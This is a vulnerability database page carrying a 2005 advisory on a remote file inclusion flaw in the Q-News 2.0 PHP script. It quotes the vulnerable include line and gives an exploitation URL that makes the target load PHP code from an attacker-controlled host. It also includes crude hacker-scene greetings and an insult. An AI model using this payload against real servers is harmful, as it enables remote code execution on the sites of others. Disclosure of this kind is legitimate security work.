Vulners
Lucene search
`Language: PHP
Script: Q-News
Version: 2.0
Official website: http://sourceforge.net/projects/q-news/
Problem: Remote file inclusion
Discovered by: ][GB][
Description:
===========
Q-News is a Quick News generator written in PHP that generates small text files that can be included a site,
it has a lot of configurable options such as Height, Width, Speed and Direction.
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "q-news.php" at line 17:
include ("$id.php");
Explotation example:
===================
http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]
Solution:
========
Not solution at this time.
Greetz:
=======
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #f4kelive
irc.org.ve #uruguay, #venezuela
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4